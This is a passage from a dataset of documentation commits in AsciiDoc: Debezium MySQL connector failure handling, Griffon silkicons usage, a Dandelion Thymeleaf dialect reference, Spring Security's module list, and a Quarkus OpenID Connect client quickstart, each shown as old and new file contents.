server.\n\n[id=\"debezium-mysql-kafka-connect-process-stops-gracefully\"]\n=== Kafka Connect stops gracefully\n\nWhen Kafka Connect stops gracefully, there is a short delay while the {prodname} MySQL connector tasks are stopped and restarted on new Kafka Connect processes.\n\n[id=\"debezium-mysql-kafka-connect-process-crashes\"]\n=== Kafka Connect process crashes\n\nIf Kafka Connect crashes, the process stops and any {prodname} MySQL connector tasks terminate without their most recently-processed offsets being recorded. In distributed mode, Kafka Connect restarts the connector tasks on other processes. However, the MySQL connector resumes from the last offset recorded by the earlier processes. This means that the replacement tasks might generate some of the same events processed prior to the crash, creating duplicate events.\n\nEach change event message includes source-specific information that you can use to identify duplicate events, for example: \n\n* Event origin\n* MySQL server's event time\n* The binlog file name and position\n* GTIDs (if used)\n\n[id=\"debezium-mysql-kafka-process-becomes-unavailable\"]\n=== Kafka becomes unavailable\n\nThe Kafka Connect framework records {prodname} change events in Kafka by using the Kafka producer API. If the Kafka brokers become unavailable, the {prodname} MySQL connector pauses until the connection is reestablished and the connector resumes where it left off.\n\n[id=\"mysql-purges-binlog-files-used-by-debezium\"]\n=== MySQL purges binlog files\n\nIf the {prodname} MySQL connector stops for too long, the MySQL server purges older binlog files and the connector's last position may be lost. When the connector is restarted, the MySQL server no longer has the starting point and the connector performs another initial snapshot. If the snapshot is disabled, the connector fails with an error.\n\nSee {link-prefix}:{link-mysql-connector}#mysql-snapshots[snapshots] for details about how MySQL connectors perform initial snapshots.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"37272c9a04af8a21633315facfd80ef219a4c0ac","subject":"Guide points to broken classnames. Fix #1","message":"Guide points to broken classnames. Fix #1\n","repos":"griffon-plugins\/griffon-silkicons-plugin","old_file":"subprojects\/griffon-silkicons-guide\/src\/asciidoc\/usage.adoc","new_file":"subprojects\/griffon-silkicons-guide\/src\/asciidoc\/usage.adoc","new_contents":"\n[[_usage]]\n= Usage\n\n== Swing\n\nThe `griffon-silk-swing:{project-version}` JAR provides a new Icon class: `{api_link_silkicon_swing}`.\nYou may use this class with any Swing component that supports an Icon property.\n\n== JavaFX\n\nThe `griffon-silk-javafx:{project-version}` JAR provides a subclass of `Image`: `{api_link_silkicon_javafx}`.\nYou may use this class with any JavaFX control that accepts a graphic property, as long as you wrap the icon with\nan `ImageView` instance.\n\n== Action Resources\n\nAction icons can be set using resources files if the following format is used:\n\n[source]\n----\niconClassName|description\n----\n\nHere's an example using the Swing icon\n\n[source,java,options=\"nowrap\"]\n.griffon-app\/i18n\/messages.properties\n----\norg.example.AppController.action.Preferences.icon=griffon.swing.support.silkicons.SilkIcon|star\n----\n\nThe JavaFX version for the same icon value is\n\n[source,java,options=\"nowrap\"]\n.griffon-app\/i18n\/messages.properties\n----\norg.example.AppController.action.Preferences.icon=griffon.javafx.support.silkicons.SilkIcon|star\n----\n","old_contents":"\n[[_usage]]\n= Usage\n\n== Swing\n\nThe `griffon-silk-swing:{project-version}` JAR provides a new Icon class: `{api_link_silkicon_swing}`.\nYou may use this class with any Swing component that supports an Icon property.\n\n== JavaFX\n\nThe `griffon-silk-javafx:{project-version}` JAR provides a subclass of `Image`: `{api_link_silkicon_javafx}`.\nYou may use this class with any JavaFX control that accepts a graphic property, as long as you wrap the icon with\nan `ImageView` instance.\n\n== Action Resources\n\nAction icons can be set using resources files if the following format is used:\n\n[source]\n----\niconClassName|description\n----\n\nHere's an example using the Swing icon\n\n[source,java,options=\"nowrap\"]\n.griffon-app\/i18n\/messages.properties\n----\norg.example.AppController.action.Preferences.icon=griffon.swing.support.silk.SilkIcon|star\n----\n\nThe JavaFX version for the same icon value is\n\n[source,java,options=\"nowrap\"]\n.griffon-app\/i18n\/messages.properties\n----\norg.example.AppController.action.Preferences.icon=griffon.javafx.support.silk.SilkIcon|star\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f5b06b5c8ab54ad8d563dd5327089d064b416d81","subject":"[Docs] Added the new Thymeleaf dialect reference","message":"[Docs] Added the new Thymeleaf dialect reference\n","repos":"pioto\/dandelion,pioto\/dandelion,pioto\/dandelion","old_file":"dandelion-docs\/src\/asciidoc\/_includes\/reference-thymeleaf-dialect.adoc","new_file":"dandelion-docs\/src\/asciidoc\/_includes\/reference-thymeleaf-dialect.adoc","new_contents":"== Appendix B: Thymeleaf dialect reference\n\n=== B.1. `ddl:bundle*` attributes\n\nThe `ddl:bundle*` attributes allow you to include bundles in (or exclude them from) the current HTTP request.\n\n[discrete]\n==== Usage\n\nIn order to include a bundle to the current HTTP request, use the `ddl:bundle-includes` attribute as follows:\n\n[source, html]\n----\n<!DOCTYPE html>\n<html xmlns:th=\"http:\/\/www.thymeleaf.org\" xmlns:ddl=\"http:\/\/www.thymeleaf.org\/dandelion\">\n <head ddl:bundle-includes=\"bundle-to-include, another-bundle-to-include\">\n ...\n <\/head>\n <body>\n ...\n <\/body>\n<\/html>\n----\n\nIn the same way, use the `ddl:bundle-excludes` attribute as follows to exclude a bundle from the current HTTP request:\n\n[source, html]\n----\n<!DOCTYPE html>\n<html xmlns:th=\"http:\/\/www.thymeleaf.org\" xmlns:ddl=\"http:\/\/www.thymeleaf.org\/dandelion\">\n <head ddl:bundle-excludes=\"bundle-to-exclude\">\n ...\n <\/head>\n <body>\n ...\n <\/body>\n<\/html>\n----\n\nTIP: Both `ddl:bundle-includes` and `ddl:bundle-excludes` attributes can be used on *any HTML tag*.\n\n[discrete]\n==== Reference\n\n.`ddl:bundle*` attributes reference\n[cols=\"2,8\"]\n|===\n|Attribute |Description\n\n|[[jsp-bundle-includes]]*ddl:bundle-includes*\n|Comma-separated list of bundles to include in the current HTTP request\n\n|[[jsp-bundle-excludes]]*ddl:bundle-excludes*\n|Comma-separated list of bundles to exclude from the current HTTP request\n|===\n\n=== B.2. `ddl:asset*` attributes\n\nThe `ddl:asset*` attributes allow you to exclude assets (JS and\/or CSS) from the current HTTP request.\n\n[discrete]\n==== Usage\n\nIn order to exclude one JS asset from the current request, use the `ddl:asset-js-excludes` as follows:\n\n[source, html]\n----\n<!DOCTYPE html>\n<html xmlns:th=\"http:\/\/www.thymeleaf.org\" xmlns:ddl=\"http:\/\/www.thymeleaf.org\/dandelion\">\n <head>\n ...\n <\/head>\n <body ddl:asset-js-excludes=\"js-asset-to-exclude, another-js-asset-to-exclude\">\n ...\n <\/body>\n<\/html>\n----\n\nAnd in order to exclude one CSS asset from the current HTTP request, use the `ddl:asset-css-excludes` as follows:\n\n[source, html]\n----\n<!DOCTYPE html>\n<html xmlns:th=\"http:\/\/www.thymeleaf.org\" xmlns:ddl=\"http:\/\/www.thymeleaf.org\/dandelion\">\n <head>\n ...\n <\/head>\n <body ddl:asset-css-excludes=\"css-asset-to-exclude\">\n ...\n <\/body>\n<\/html>\n----\n\nTIP: As `ddl:bundle*` attributes, `ddl:asset*` attributes can be used on *any HTML tag*.\n\n[discrete]\n==== Reference\n\n.`ddl:asset*` attributes reference\n[cols=\"2,8\"]\n|===\n|Attribute |Description\n\n|[[jsp-asset-js-excludes]]*ddl:asset-js-excludes*\n|Comma-separated list of JS asset names to exclude from the current HTTP request\n\n|[[jsp-asset-css-excludes]]*ddl:asset-css-excludes*\n|Comma-separated list of CSS asset names to exclude from the current HTTP request\n|===\n","old_contents":"== Appendix B: Thymeleaf dialect reference\n\n=== B.1. `ddl:bundle*` attributes\n\n=== B.2. `ddl:asset*` attributes\n\n\n","returncode":0,"stderr":"","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"35797f9a745b9ebf1225bf46929296622aa8a94e","subject":"Add Resource Server to Modules Section","message":"Add Resource Server to Modules Section\n\nFixes gh-7498\n","repos":"jgrandja\/spring-security,spring-projects\/spring-security,jgrandja\/spring-security,rwinch\/spring-security,spring-projects\/spring-security,fhanik\/spring-security,fhanik\/spring-security,djechelon\/spring-security,spring-projects\/spring-security,jgrandja\/spring-security,fhanik\/spring-security,fhanik\/spring-security,rwinch\/spring-security,rwinch\/spring-security,spring-projects\/spring-security,fhanik\/spring-security,jgrandja\/spring-security,rwinch\/spring-security,djechelon\/spring-security,spring-projects\/spring-security,jgrandja\/spring-security,jgrandja\/spring-security,djechelon\/spring-security,rwinch\/spring-security,spring-projects\/spring-security,fhanik\/spring-security,rwinch\/spring-security,djechelon\/spring-security,spring-projects\/spring-security,djechelon\/spring-security","old_file":"docs\/manual\/src\/docs\/asciidoc\/_includes\/about\/modules.adoc","new_file":"docs\/manual\/src\/docs\/asciidoc\/_includes\/about\/modules.adoc","new_contents":"\/\/ FIXME: This might make sense in Getting Spring Security along with the artifact information\n\n[[modules]]\n= Project Modules\nIn Spring Security 3.0, the codebase was sub-divided into separate jars which more clearly separate different functionality areas and third-party dependencies.\nIf you use Maven to build your project, these are the modules you should add to your `pom.xml`.\nEven if you do not use Maven, we recommend that you consult the `pom.xml` files to get an idea of third-party dependencies and versions.\nAnother good idea is to examine the libraries that are included in the sample applications.\n\n\n[[spring-security-core]]\n== Core -- `spring-security-core.jar`\nThis module contains core authentication and access-contol classes and interfaces, remoting support, and basic provisioning APIs.\nIt is required by any application that uses Spring Security.\nIt supports standalone applications, remote clients, method (service layer) security, and JDBC user provisioning.\nIt contains the following top-level packages:\n\n* `org.springframework.security.core`\n* `org.springframework.security.access`\n* `org.springframework.security.authentication`\n* `org.springframework.security.provisioning`\n\n[[spring-security-remoting]]\n== Remoting -- `spring-security-remoting.jar`\nThis module provides integration with Spring Remoting.\nYou do not need this unless you are writing a remote client that uses Spring Remoting.\nThe main package is `org.springframework.security.remoting`.\n\n\n[[spring-security-web]]\n== Web -- `spring-security-web.jar`\nThis module contains filters and related web-security infrastructure code.\nIt contains anything with a servlet API dependency.\nYou need it if you require Spring Security web authentication services and URL-based access-control.\nThe main package is `org.springframework.security.web`.\n\n\n[[spring-security-config]]\n== Config -- `spring-security-config.jar`\nThis module contains the security namespace parsing code and Java configuration code.\nYou need it if you use the Spring Security XML namespace for configuration or Spring Security's Java Configuration support.\nThe main package is `org.springframework.security.config`.\nNone of the classes are intended for direct use in an application.\n\n\n[[spring-security-ldap]]\n== LDAP -- `spring-security-ldap.jar`\nThis module provides LDAP authentication and provisioning code.\nIt is required if you need to use LDAP authentication or manage LDAP user entries.\nThe top-level package is `org.springframework.security.ldap`.\n\n\n[[spring-security-oauth2-core]]\n== OAuth 2.0 Core -- `spring-security-oauth2-core.jar`\n`spring-security-oauth2-core.jar` contains core classes and interfaces that provide support for the OAuth 2.0 Authorization Framework and for OpenID Connect Core 1.0.\nIt is required by applications that use OAuth 2.0 or OpenID Connect Core 1.0, such as client, resource server, and authorization server.\nThe top-level package is `org.springframework.security.oauth2.core`.\n\n\n[[spring-security-oauth2-client]]\n== OAuth 2.0 Client -- `spring-security-oauth2-client.jar`\n`spring-security-oauth2-client.jar` contains Spring Security's client support for OAuth 2.0 Authorization Framework and OpenID Connect Core 1.0.\nIt is required by applications that use OAuth 2.0 Login or OAuth Client support.\nThe top-level package is `org.springframework.security.oauth2.client`.\n\n\n[[spring-security-oauth2-jose]]\n== OAuth 2.0 JOSE -- `spring-security-oauth2-jose.jar`\n`spring-security-oauth2-jose.jar` contains Spring Security's support for the JOSE (Javascript Object Signing and Encryption) framework.\nThe JOSE framework is intended to provide a method to securely transfer claims between parties.\nIt is built from a collection of specifications:\n\n* JSON Web Token (JWT)\n* JSON Web Signature (JWS)\n* JSON Web Encryption (JWE)\n* JSON Web Key (JWK)\n\nIt contains the following top-level packages:\n\n* `org.springframework.security.oauth2.jwt`\n* `org.springframework.security.oauth2.jose`\n\n[[spring-security-oauth2-resource-server]]\n== OAuth 2.0 Resource Server -- `spring-security-oauth2-resource-server.jar`\n`spring-security-oauth2-resource-server.jar` contains Spring Security's support for OAuth 2.0 Resource Servers.\nIt is used to protect APIs via OAuth 2.0 Bearer Tokens.\nThe top-level package is `org.springframework.security.oauth2.server.resource`.\n\n[[spring-security-acl]]\n== ACL -- `spring-security-acl.jar`\nThis module contains a specialized domain object ACL implementation.\nIt is used to apply security to specific domain object instances within your application.\nThe top-level package is `org.springframework.security.acls`.\n\n\n[[spring-security-cas]]\n== CAS -- `spring-security-cas.jar`\nThis module contains Spring Security's CAS client integration.\nYou should use it if you want to use Spring Security web authentication with a CAS single sign-on server.\nThe top-level package is `org.springframework.security.cas`.\n\n\n[[spring-security-openid]]\n== OpenID -- `spring-security-openid.jar`\nThis module contains OpenID web authentication support.\nIt is used to authenticate users against an external OpenID server.\nThe top-level package is `org.springframework.security.openid`.\nIt requires OpenID4Java.\n\n\n[[spring-security-test]]\n== Test -- `spring-security-test.jar`\nThis module contains support for testing with Spring Security.\n","old_contents":"\/\/ FIXME: This might make sense in Getting Spring Security along with the artifact information\n\n[[modules]]\n= Project Modules\nIn Spring Security 3.0, the codebase was sub-divided into separate jars which more clearly separate different functionality areas and third-party dependencies.\nIf you use Maven to build your project, these are the modules you should add to your `pom.xml`.\nEven if you do not use Maven, we recommend that you consult the `pom.xml` files to get an idea of third-party dependencies and versions.\nAnother good idea is to examine the libraries that are included in the sample applications.\n\n\n[[spring-security-core]]\n== Core -- `spring-security-core.jar`\nThis module contains core authentication and access-contol classes and interfaces, remoting support, and basic provisioning APIs.\nIt is required by any application that uses Spring Security.\nIt supports standalone applications, remote clients, method (service layer) security, and JDBC user provisioning.\nIt contains the following top-level packages:\n\n* `org.springframework.security.core`\n* `org.springframework.security.access`\n* `org.springframework.security.authentication`\n* `org.springframework.security.provisioning`\n\n[[spring-security-remoting]]\n== Remoting -- `spring-security-remoting.jar`\nThis module provides integration with Spring Remoting.\nYou do not need this unless you are writing a remote client that uses Spring Remoting.\nThe main package is `org.springframework.security.remoting`.\n\n\n[[spring-security-web]]\n== Web -- `spring-security-web.jar`\nThis module contains filters and related web-security infrastructure code.\nIt contains anything with a servlet API dependency.\nYou need it if you require Spring Security web authentication services and URL-based access-control.\nThe main package is `org.springframework.security.web`.\n\n\n[[spring-security-config]]\n== Config -- `spring-security-config.jar`\nThis module contains the security namespace parsing code and Java configuration code.\nYou need it if you use the Spring Security XML namespace for configuration or Spring Security's Java Configuration support.\nThe main package is `org.springframework.security.config`.\nNone of the classes are intended for direct use in an application.\n\n\n[[spring-security-ldap]]\n== LDAP -- `spring-security-ldap.jar`\nThis module provides LDAP authentication and provisioning code.\nIt is required if you need to use LDAP authentication or manage LDAP user entries.\nThe top-level package is `org.springframework.security.ldap`.\n\n\n[[spring-security-oauth2-core]]\n== OAuth 2.0 Core -- `spring-security-oauth2-core.jar`\n`spring-security-oauth2-core.jar` contains core classes and interfaces that provide support for the OAuth 2.0 Authorization Framework and for OpenID Connect Core 1.0.\nIt is required by applications that use OAuth 2.0 or OpenID Connect Core 1.0, such as client, resource server, and authorization server.\nThe top-level package is `org.springframework.security.oauth2.core`.\n\n\n[[spring-security-oauth2-client]]\n== OAuth 2.0 Client -- `spring-security-oauth2-client.jar`\n`spring-security-oauth2-client.jar` contains Spring Security's client support for OAuth 2.0 Authorization Framework and OpenID Connect Core 1.0.\nIt is required by applications that use OAuth 2.0 Login or OAuth Client support.\nThe top-level package is `org.springframework.security.oauth2.client`.\n\n\n[[spring-security-oauth2-jose]]\n== OAuth 2.0 JOSE -- `spring-security-oauth2-jose.jar`\n`spring-security-oauth2-jose.jar` contains Spring Security's support for the JOSE (Javascript Object Signing and Encryption) framework.\nThe JOSE framework is intended to provide a method to securely transfer claims between parties.\nIt is built from a collection of specifications:\n\n* JSON Web Token (JWT)\n* JSON Web Signature (JWS)\n* JSON Web Encryption (JWE)\n* JSON Web Key (JWK)\n\nIt contains the following top-level packages:\n\n* `org.springframework.security.oauth2.jwt`\n* `org.springframework.security.oauth2.jose`\n\n\n[[spring-security-acl]]\n== ACL -- `spring-security-acl.jar`\nThis module contains a specialized domain object ACL implementation.\nIt is used to apply security to specific domain object instances within your application.\nThe top-level package is `org.springframework.security.acls`.\n\n\n[[spring-security-cas]]\n== CAS -- `spring-security-cas.jar`\nThis module contains Spring Security's CAS client integration.\nYou should use it if you want to use Spring Security web authentication with a CAS single sign-on server.\nThe top-level package is `org.springframework.security.cas`.\n\n\n[[spring-security-openid]]\n== OpenID -- `spring-security-openid.jar`\nThis module contains OpenID web authentication support.\nIt is used to authenticate users against an external OpenID server.\nThe top-level package is `org.springframework.security.openid`.\nIt requires OpenID4Java.\n\n\n[[spring-security-test]]\n== Test -- `spring-security-test.jar`\nThis module contains support for testing with Spring Security.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b5cbe7cdfe4ab1a29b416f6818acabc56a9707e6","subject":"Incorporate quickstart changes in security-openid-connect-client guide","message":"Incorporate quickstart changes in security-openid-connect-client guide\n\nhttps:\/\/github.com\/quarkusio\/quarkus-quickstarts\/pull\/1140 renamed two classes and two fields so that the demo more clearly communicates the usage of the RequestFilters.\n\nSigned-off-by: Harald Albers <64b2b6d12bfe4baae7dad3d018f8cbf6b0e7a044@albersweb.de>\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/security-openid-connect-client.adoc","new_file":"docs\/src\/main\/asciidoc\/security-openid-connect-client.adoc","new_contents":"\/\/\/\/\nThis guide is maintained in the main Quarkus repository\nand pull requests should be submitted there:\nhttps:\/\/github.com\/quarkusio\/quarkus\/tree\/main\/docs\/src\/main\/asciidoc\n\/\/\/\/\n= OpenID Connect Client and Token Propagation Quickstart\n\ninclude::.\/attributes.adoc[]\n:toc:\n\nThis quickstart demonstrates how to use `OpenID Connect Client Reactive Filter` to acquire and propagate access tokens as `HTTP Authorization Bearer` access tokens, alongside `OpenID Token Propagation Reactive Filter` which propagates the incoming `HTTP Authorization Bearer` access tokens.\n\nPlease check xref:security-openid-connect-client-reference.adoc[OpenID Connect Client and Token Propagation Reference Guide] for all the information related to `Oidc Client` and `Token Propagation` support in Quarkus.\n\nPlease also read xref:security-openid-connect.adoc[Using OpenID Connect to Protect Service Applications] guide if you need to protect your applications using Bearer Token Authorization.\n\n== Prerequisites\n\n:prerequisites-docker:\ninclude::{includes}\/prerequisites.adoc[]\n* https:\/\/stedolan.github.io\/jq\/[jq tool]\n\n== Architecture\n\nIn this example, we will build an application which consists of two JAX-RS resources, `FrontendResource` and `ProtectedResource`. `FrontendResource` propagates access tokens to `ProtectedResource` and uses either `OpenID Connect Client Reactive Filter` to acquire a token first before propagating it or `OpenID Token Propagation Reactive Filter` to propagate the incoming, already existing access token.\n\n`FrontendResource` has 4 endpoints:\n\n* `\/frontend\/user-name-with-oidc-client-token`\n* `\/frontend\/admin-name-with-oidc-client-token`\n* `\/frontend\/user-name-with-propagated-token`\n* `\/frontend\/admin-name-with-propagated-token`\n\n`FrontendResource` will use REST Client with `OpenID Connect Client Reactive Filter` to acquire and propagate an access token to `ProtectedResource` when either `\/frontend\/user-name-with-oidc-client` or `\/frontend\/admin-name-with-oidc-client` is called. And it will use REST Client with `OpenID Connect Token Propagation Reactive Filter` to propagate the current incoming access token to `ProtectedResource` when either `\/frontend\/user-name-with-propagated-token` or `\/frontend\/admin-name-with-propagated-token` is called.\n\n`ProtecedResource` has 2 endpoints:\n\n* `\/protected\/user-name`\n* `\/protected\/admin-name`\n\nBoth of these endpoints return the username extracted from the incoming access token which was propagated to `ProtectedResource` from `FrontendResource`. The only difference between these endpoints is that calling `\/protected\/user-name` is only allowed if the current access token has a `user` role and calling `\/protected\/admin-name` is only allowed if the current access token has an `admin` role.\n\n== Solution\n\nWe recommend that you follow the instructions in the next sections and create the application step by step.\nHowever, you can go right to the completed example.\n\nClone the Git repository: `git clone {quickstarts-clone-url}`, or download an {quickstarts-archive-url}[archive].\n\nThe solution is located in the `security-openid-connect-quickstart` {quickstarts-tree-url}\/security-openid-connect-client-quickstart[directory].\n\n== Creating the Maven Project\n\nFirst, we need a new project. Create a new project with the following command:\n\n:create-app-artifact-id: security-openid-connect-client-quickstart\n:create-app-extensions: oidc,oidc-client-reactive-filter,oidc-token-propagation-reactive,resteasy-reactive\ninclude::{includes}\/devtools\/create-app.adoc[]\n\nThis command generates a Maven project, importing the `oidc`, `oidc-client-reactive-filter`, `oidc-client-reactive-filter` and `resteasy-reactive` extensions.\n\nIf you already have your Quarkus project configured, you can add these extensions to your project by running the following command in your project base directory:\n\n:add-extension-extensions: oidc,oidc-client-reactive-filter,oidc-token-propagation-reactive,resteasy-reactive\ninclude::{includes}\/devtools\/extension-add.adoc[]\n\nThis will add the following to your build file:\n\n[source,xml,role=\"primary asciidoc-tabs-target-sync-cli asciidoc-tabs-target-sync-maven\"]\n.pom.xml\n----\n<dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-oidc<\/artifactId>\n<\/dependency>\n<dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-oidc-client-reactive-filter<\/artifactId>\n<\/dependency>\n<dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-oidc-token-propagation-reactive<\/artifactId>\n<\/dependency>\n<dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-resteasy-reactive<\/artifactId>\n<\/dependency>\n----\n\n[source,gradle,role=\"secondary asciidoc-tabs-target-sync-gradle\"]\n.build.gradle\n----\nimplementation(\"io.quarkus:quarkus-oidc,oidc-client-reactive-filter,oidc-token-propagation-reactive,resteasy-reactive\")\n----\n\n== Writing the application\n\nLet's start by implementing `ProtectedResource`:\n\n[source,java]\n----\npackage org.acme.security.openid.connect.client;\n\nimport javax.annotation.security.RolesAllowed;\nimport javax.inject.Inject;\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.Produces;\n\nimport io.quarkus.security.Authenticated;\nimport io.smallrye.mutiny.Uni;\n\nimport org.eclipse.microprofile.jwt.JsonWebToken;\n\n@Path(\"\/protected\")\n@Authenticated\npublic class ProtectedResource {\n\n @Inject\n JsonWebToken principal;\n\n @GET\n @RolesAllowed(\"user\")\n @Produces(\"text\/plain\")\n @Path(\"userName\")\n public Uni<String> userName() {\n return Uni.createFrom().item(principal.getName());\n }\n\n @GET\n @RolesAllowed(\"admin\")\n @Produces(\"text\/plain\")\n @Path(\"adminName\")\n public Uni<String> adminName() {\n return Uni.createFrom().item(principal.getName());\n }\n}\n----\n\nAs you can see `ProtectedResource` returns a name from both `userName()` and `adminName()` methods. The name is extracted from the current `JsonWebToken`.\n\nNext lets add REST Client with `OpenID Connect Client Reactive Filter` and another REST Client with `OpenID Connect Token Propagation Filter`, `FrontendResource` will use these two clients to call `ProtectedResource`:\n\n[source,java]\n----\npackage org.acme.security.openid.connect.client;\n\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.Produces;\n\nimport org.eclipse.microprofile.rest.client.annotation.RegisterProvider;\nimport org.eclipse.microprofile.rest.client.inject.RegisterRestClient;\n\nimport io.quarkus.oidc.client.reactive.filter.OidcClientRequestReactiveFilter;\nimport io.smallrye.mutiny.Uni;\n\n@RegisterRestClient\n@RegisterProvider(OidcClientRequestReactiveFilter.class)\n@Path(\"\/\")\npublic interface RestClientWithOidcClientFilter {\n\n @GET\n @Produces(\"text\/plain\")\n @Path(\"userName\")\n Uni<String> getUserName();\n\n @GET\n @Produces(\"text\/plain\")\n @Path(\"adminName\")\n Uni<String> getAdminName();\n}\n----\n\nwhere `RestClientWithOidcClientFilter` will depend on `OidcClientRequestReactiveFilter` to acquire and propagate the tokens and\n\n[source,java]\n----\npackage org.acme.security.openid.connect.client;\n\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.Produces;\n\nimport org.eclipse.microprofile.rest.client.annotation.RegisterProvider;\nimport org.eclipse.microprofile.rest.client.inject.RegisterRestClient;\n\nimport io.quarkus.oidc.token.propagation.reactive.AccessTokenRequestReactiveFilter;\nimport io.smallrye.mutiny.Uni;\n\n@RegisterRestClient\n@RegisterProvider(AccessTokenRequestReactiveFilter.class)\n@Path(\"\/\")\npublic interface RestClientWithTokenPropagationFilter {\n\n @GET\n @Produces(\"text\/plain\")\n @Path(\"userName\")\n Uni<String> getUserName();\n\n @GET\n @Produces(\"text\/plain\")\n @Path(\"adminName\")\n Uni<String> getAdminName();\n}\n----\n\nwhere `RestClientWithTokenPropagationFilter` will depend on `AccessTokenRequestReactiveFilter` to propagate the incoming, already existing tokens.\n\nNote that both `RestClientWithOidcClientFilter` and `RestClientWithTokenPropagationFilter` interfaces are identical - the reason behind it is that combining `OidcClientRequestReactiveFilter` and `AccessTokenRequestReactiveFilter` on the same REST Client will cause side effects as both filters can interfere with other, for example, `OidcClientRequestReactiveFilter` may override the token propagated by `AccessTokenRequestReactiveFilter` or `AccessTokenRequestReactiveFilter` can fail if it is called when no token is available to propagate and `OidcClientRequestReactiveFilter` is expected to acquire a new token instead.\n\nNow let's complete creating the application with adding `FrontendResource`:\n\n[source,java]\n----\npackage org.acme.security.openid.connect.client;\n\nimport javax.inject.Inject;\nimport javax.ws.rs.GET;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.Produces;\n\nimport org.eclipse.microprofile.rest.client.inject.RestClient;\n\nimport io.smallrye.mutiny.Uni;\n\n@Path(\"\/frontend\")\npublic class FrontendResource {\n @Inject\n @RestClient\n RestClientWithOidcClientFilter restClientWithOidcClientFilter;\n\n @Inject\n @RestClient\n RestClientWithTokenPropagationFilter restClientWithTokenPropagationFilter;\n\n @GET\n @Path(\"user-name-with-oidc-client-token\")\n @Produces(\"text\/plain\")\n public Uni<String> getUserNameWithOidcClientToken() {\n return restClientWithOidcClientFilter.getUserName();\n }\n\n @GET\n @Path(\"admin-name-with-oidc-client-token\")\n @Produces(\"text\/plain\")\n public Uni<String> getAdminNameWithOidcClientToken() {\n\t return restClientWithOidcClientFilter.getAdminName();\n }\n\n @GET\n @Path(\"user-name-with-propagated-token\")\n @Produces(\"text\/plain\")\n public Uni<String> getUserNameWithPropagatedToken() {\n return restClientWithTokenPropagationFilter.getUserName();\n }\n\n @GET\n @Path(\"admin-name-with-propagated-token\")\n @Produces(\"text\/plain\")\n public Uni<String> getAdminNameWithPropagatedToken() {\n return restClientWithTokenPropagationFilter.getAdminName();\n }\n}\n----\n\n`FrontendResource` will use REST Client with `OpenID Connect Client Reactive Filter` to acquire and propagate an access token to `ProtectedResource` when either `\/frontend\/user-name-with-oidc-client` or `\/frontend\/admin-name-with-oidc-client` is called. And it will use REST Client with `OpenID Connect Token Propagation Reactive Filter` to propagate the current incoming access token to `ProtectedResource` when either `\/frontend\/user-name-with-propagated-token` or `\/frontend\/admin-name-with-propagated-token` is called.\n\nFinally, lets add a JAX-RS `ExceptionMapper`:\n\n[source,java]\n----\npackage org.acme.security.openid.connect.client;\n\nimport javax.ws.rs.core.Response;\nimport javax.ws.rs.ext.ExceptionMapper;\nimport javax.ws.rs.ext.Provider;\n\nimport org.jboss.resteasy.reactive.ClientWebApplicationException;\n\n@Provider\npublic class FrontendExceptionMapper implements ExceptionMapper<ClientWebApplicationException> {\n\n\t@Override\n\tpublic Response toResponse(ClientWebApplicationException t) {\n\t\treturn Response.status(t.getResponse().getStatus()).build();\n\t}\n\n}\n----\n\nThis exception mapper is only added to verify during the tests that `ProtectedResource` returns `403` when the token has no expected role. Without this mapper `RESTEasy Reactive` will correctly convert the exceptions which will escape from REST Client calls to `500` to avoid leaking the information from the downstream resources such as `ProtectedResource` but in the tests it will not be possible to assert that `500` is in fact caused by an authorization exception as opposed to some internal error.\n\n== Configuring the application\n\nWe have prepared the code, and now let's configure the application:\n\n[source,properties]\n----\n# Configure OIDC\n\n%prod.quarkus.oidc.auth-server-url=http:\/\/localhost:8180\/realms\/quarkus\nquarkus.oidc.client-id=backend-service\nquarkus.oidc.credentials.secret=secret\n\n# Tell Dev Services for Keycloak to import the realm file\n# This property is not effective when running the application in JVM or Native modes but only in dev and test modes.\n\nquarkus.keycloak.devservices.realm-path=quarkus-realm.json\n\n# Configure OIDC Client\n\nquarkus.oidc-client.auth-server-url=${quarkus.oidc.auth-server-url}\nquarkus.oidc-client.client-id=${quarkus.oidc.client-id}\nquarkus.oidc-client.credentials.secret=${quarkus.oidc.credentials.secret}\nquarkus.oidc-client.grant.type=password\nquarkus.oidc-client.grant-options.password.username=alice\nquarkus.oidc-client.grant-options.password.password=alice\n\n# Configure REST Clients\n\n%prod.port=8080\n%dev.port=8080\n%test.port=8081\n\norg.acme.security.openid.connect.client.RestClientWithOidcClientFilter\/mp-rest\/url=http:\/\/localhost:${port}\/protected\norg.acme.security.openid.connect.client.RestClientWithTokenPropagationFilter\/mp-rest\/url=http:\/\/localhost:${port}\/protected\n----\n\nThis configuration references Keycloak which will be used by `ProtectedResource` to verify the incoming access tokens and by `OidcClient` to get the tokens for a user `alice` using a `password` grant. Both RESTClients point to `ProtectedResource`'s HTTP address.\n\nNOTE: Adding a `%prod.` profile prefix to `quarkus.oidc.auth-server-url` ensures that `Dev Services for Keycloak` will launch a container for you when the application is run in dev or test modes. See <<keycloak-dev-mode, Running the Application in Dev mode>> section below for more information.\n\n== Starting and Configuring the Keycloak Server\n\nNOTE: Do not start the Keycloak server when you run the application in dev mode or test modes - `Dev Services for Keycloak` will launch a container. See <<keycloak-dev-mode, Running the Application in Dev mode>> section below for more information. Make sure to put the {quickstarts-tree-url}\/security-openid-connect-client-quickstart\/config\/quarkus-realm.json[realm configuration file] on the classpath (`target\/classes` directory) so that it gets imported automatically when running in dev mode - unless you have already built a {quickstarts-tree-url}\/security-openid-connect-quickstart[complete solution] in which case this realm file will be added to the classpath during the build.\n\nTo start a Keycloak Server you can use Docker and just run the following command:\n\n[source,bash,subs=attributes+]\n----\ndocker run --name 